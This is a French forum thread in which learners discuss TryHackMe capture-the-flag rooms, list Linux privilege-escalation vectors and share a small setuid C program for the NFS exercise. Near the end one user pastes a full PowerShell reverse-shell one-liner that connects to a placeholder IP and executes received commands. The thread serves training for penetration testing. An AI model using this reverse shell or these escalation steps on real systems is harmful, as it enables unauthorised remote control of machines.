InscriptionConnexion
Me0w
Me0w
4 mois
Courage
:-(
Je viens de finir ce challenge : tryhackme.com https://tryhackme.com/room/brooklynninenine 60 points pour une challenge assez simple, je la suggère au débutant elle est sympa
:miko_think:
il y a 4 mois
Me0w
Me0w
4 mois
Courage
:-(
Challenge plutôt sympa : tryhackme.com https://tryhackme.com/room/easypeasyctf

Il te donne 330 points ! Tu bosse sur l'énumération ainsi que la stéganographie, je conseil linpeas.sh pour trouver l'élévation de privilèges
:miko_think:
il y a 4 mois
miko
miko
4 mois
Je viens de finir ce challenge : tryhackme.com https://tryhackme.com/room/brooklynninenine 60 points pour une challenge assez simple, je la suggère au débutant elle est sympa
:miko_think:
Effectivement, c'était 60 points gratuits
:Happycat:


Enfin, y'a une semaine j'aurais sûrement mis beaucoup plus de temps, j'ai appris énormément de techniques très rapidement.

Je manquais de méthodologie.
:miaou:

il y a 4 mois
miko
miko
4 mois
Challenge plutôt sympa : tryhackme.com https://tryhackme.com/room/easypeasyctf

Il te donne 330 points ! Tu bosse sur l'énumération ainsi que la stéganographie, je conseil linpeas.sh pour trouver l'élévation de privilèges
:miko_think:
Je garde de côté parce que je suis pas très formé sur la stéganographie pour l'instant.
:miaou:

il y a 4 mois
Je viens de repasser premier, mais l'autre va sûrement rush des learning path pour débutant qui rapportent des points histoire de bien me casser les couilles...
:miaou:

il y a 4 mois
Me0w
Me0w
4 mois
Je garde de côté parce que je suis pas très formé sur la stéganographie pour l'instant.
De mon côté il faut vraiment que je fasse le path des privilèges escalation, c'est là où j'ai encore du mal une fois mon shell upload
:miko_think:


Si le deuxième à le premium il peut facilement rush des paths easy en plus, j'ai amassé énormément de points dû à ça
:miko_think:
il y a 4 mois
miko
miko
4 mois
De mon côté il faut vraiment que je fasse le path des privilèges escalation, c'est là où j'ai encore du mal une fois mon shell upload
:miko_think:


Si le deuxième à le premium il peut facilement rush des paths easy en plus, j'ai amassé énormément de points dû à ça
:miko_think:
Si tu parles de celui-la : tryhackme.com https://tryhackme.com/room/linprivesc

Effectivement, elle est très complète et m'a appris beaucoup de techniques et surtout des bases méthodologiques pour énumérer les vecteurs potentiels d'escalade.
:miaou:

il y a 4 mois
En gros, je pense qu'on peut se servir de cette room comme "d'algorithme" une fois qu'on a trouvé un accès dans la machine cible d'un challenge.

Une fois un reverse-shell avec privilèges restreints uploadé dans un room de challenge, tu peux tester les points suivants :

- Exploits du kernel (linpeas.sh peut aider)
- Sudo => gtfobins
- SUID => gtfobins
- Capabilities => cap_setuid
- Tâches CRON => Tâche encore présente en config mais script supprimé dans un répertoire auquel l'utilisateur qu'on utilise a un accès en écriture (donc il suffit de réécrire le script qu'on veut (un script malveillant donc))
- Network File Sharing (possibilité de chmod +s localement avant que le script malveillant soit répliqué sur la cible)
- PATH
:miaou:

il y a 4 mois
Pour chopper un CDI oui


mais en freelance je faisais mes sous bien avant d'avoir l'OSCP
:Ent2:
Tu t'es formé combien de temps réellement jusqu'à l'obtention de l'OSCP?
Mariama ou l'Oracle de Mayotte
il y a 4 mois
Pour te faire gagner du temps :

Si a un moment tu as une erreur avec gcc lors de la compilation ou lors du lancement d'un binaire c'est qu'il faut compiler le programme avec l'option --static pour inclure tes bibliothèques dans l'exécutable.

Le walkthrough ne précise pas ça, et lorsqu'ils te donnent un programme c à compiler, ils te précisent pas non plus qu'il faut include unistd.h et une autre bibliothèque (ça concerne les appels des fonctions setuid(..) setgid(...) et system(...) )
:miaou:

il y a 4 mois
Me0w
Me0w
4 mois
Si tu parles de celui-la : tryhackme.com https://tryhackme.com/room/linprivesc

Effectivement, elle est très complète et m'a appris beaucoup de techniques et surtout des bases méthodologiques pour énumérer les vecteurs potentiels d'escalade.
Effectivement je parle de celle là, je pense que je vais la faire aujourd'hui, ça me permettras de compléter le path Jr Penetration Tester en même temps
:miko_think:


C'est vraiment ce qui me manque une fois le reverse shell upload, des connaissances plus approfondis sur comment élever mes privilèges.

J'ai fais une machine tout à l'heure où je devais justement élevé mes privilèges via un cronjob caché, c'était bien sympa bien que assez simple, merci linpeas
:miko_think:
il y a 4 mois
Me0w
Me0w
4 mois
Pour te faire gagner du temps :

Si a un moment tu as une erreur avec gcc lors de la compilation ou lors du lancement d'un binaire c'est qu'il faut compiler le programme avec l'option --static pour inclure tes bibliothèques dans l'exécutable.

Le walkthrough ne précise pas ça, et lorsqu'ils te donnent un programme c à compiler, ils te précisent pas non plus qu'il faut include unistd.h et une autre bibliothèque (ça concerne les appels des fonctions setuid(..) setgid(...) et system(...) )
Bon à savoir ça, je ne savais pas qu'ils te faisaient aussi compiler des programmes
:miko_think:
il y a 4 mois
miko
miko
4 mois
Bon à savoir ça, je ne savais pas qu'ils te faisaient aussi compiler des programmes
:miko_think:
Rien de méchant du tout.

Le programme t'es donné, et c'est juste ça :

int main() {
setuid(0);
setgid(0);
system("thm");
}

Mais ce qu'ils disent pas c'est qu'il manque deux include (unistd, et un autre pour system).

include est une directive de préprocesseur qui sert à charger une bibliothèque (si jamais t'as jamais fait de c)

#include <nom_de_bibliotheque.h>

Et il faudra le compiler avec gcc --static path.c -o path

Comme ça quand tu devras lancer le programme, t'auras pas une erreur qui t'indique une référence indéfinie.. C'est dans la partie NFS si je me souviens bien.

Enfin tu verras, hésite pas si t'as besoin d'indices ou d'aide (comme je l'ai fait récemment)
:miaou:

il y a 4 mois
Parce qu'en fait, dans la partie NFS de cette room, tu n'as pas gcc sur la machine cible, donc t'es obligé de compiler depuis ta machine, qui dit absence de gcc dit aussi absence de certaines bibliothèques, d'où l'importance d'inclure les bibliothèques dans le binaire lors de la compilation.
:miaou:

il y a 4 mois
Vous êtes sur Linux pour faire ça ?
:pensif:
il y a 4 mois
Me0w
Me0w
4 mois
Rien de méchant du tout.

Le programme t'es donné, et c'est juste ça :

int main() {
setuid(0);
setgid(0);
system("thm");
}

Mais ce qu'ils disent pas c'est qu'il manque deux include (unistd, et un autre pour system).

include est une directive de préprocesseur qui sert à charger une bibliothèque (si jamais t'as jamais fait de c)

#include <nom_de_bibliotheque.h>

Et il faudra le compiler avec gcc --static path.c -o path

Comme ça quand tu devras lancer le programme, t'auras pas une erreur qui t'indique une référence indéfinie.. C'est dans la partie NFS si je me souviens bien.

Enfin tu verras, hésite pas si t'as besoin d'indices ou d'aide (comme je l'ai fait récemment)
Je vois, merci des infos je prends notes. Je comprends assez bien, j'ai fais du C quand j'étais à 42. J'ai commencé le module je suis sur "What the Shell ?", room premium qui t'apprends à faire des reverse shell/bind shell puis ensuite je passe sur linux privilege escalation , je te dirais ce que ça donne une fois dessus
:miko_think:
il y a 4 mois
1234567
1234567
4 mois
Vous êtes sur Linux pour faire ça ?
:pensif:
Oui, mais perso j'utilise une VM kali linux (même si je suis déjà sur linux), t'as tout de pré-installé
:chat_lunettes:
il y a 4 mois
1234567
1234567
4 mois
Vous êtes sur Linux pour faire ça ?
:pensif:
J'utilise une VM kali parce que c'est extrêmement pratique et que j'aime pas faire du pentest sur mon OS principal (je suis sous linux mais ça change rien, windows sait aussi faire tourner des VM).

Peu importe l'os que tu utilises, tant que tu peux faire tourner une VM kali (ou toute autre distribution qui intègre des outils d'audit)

Edit : @Pepe a résumé en une ligne

Mais, si t'as quesiton était : faut-il avoir des connaissances sur l'utilisation de linux ? La réponse est oui, quasiment tous les serveurs sont sous linux, et tu dois élever tes privilèges une fois que tu as accès à la machine cible, donc une bonne connaissance de bash est fortement recommandée.
:miaou:

il y a 4 mois
@Me0w J'ai fais paniquer mon Windows en prenant des notes ayaa, j'ai noté un reverse-shell pour powershell dans Obsidian (app pour prendre des notes), dès le moment ou j'ai collé le reverse shell, mon Windows la détecté comme un virus et à supprimé mon fichier de notes
:uuh:


Le reverse-shell en question :

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
il y a 4 mois
miko
miko
4 mois
@Me0w J'ai fais paniquer mon Windows en prenant des notes ayaa, j'ai noté un reverse-shell pour powershell dans Obsidian (app pour prendre des notes), dès le moment ou j'ai collé le reverse shell, mon Windows la détecté comme un virus et à supprimé mon fichier de notes
:uuh:


Le reverse-shell en question :

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Ahi, au moins windows defender fonctionne bien.

C'est ça que j'aime pas avec lui, parfois tu veux juste faire un truc légitime et t'es emmerdé par un faux positif..

C'est souvent le cas avec les jeux crackés, c'est pour ça que j'ai une partition windows 10 sans windows defender (et une autre avec)

(J'ai 2 windows et un linux)
:miaou:

il y a 4 mois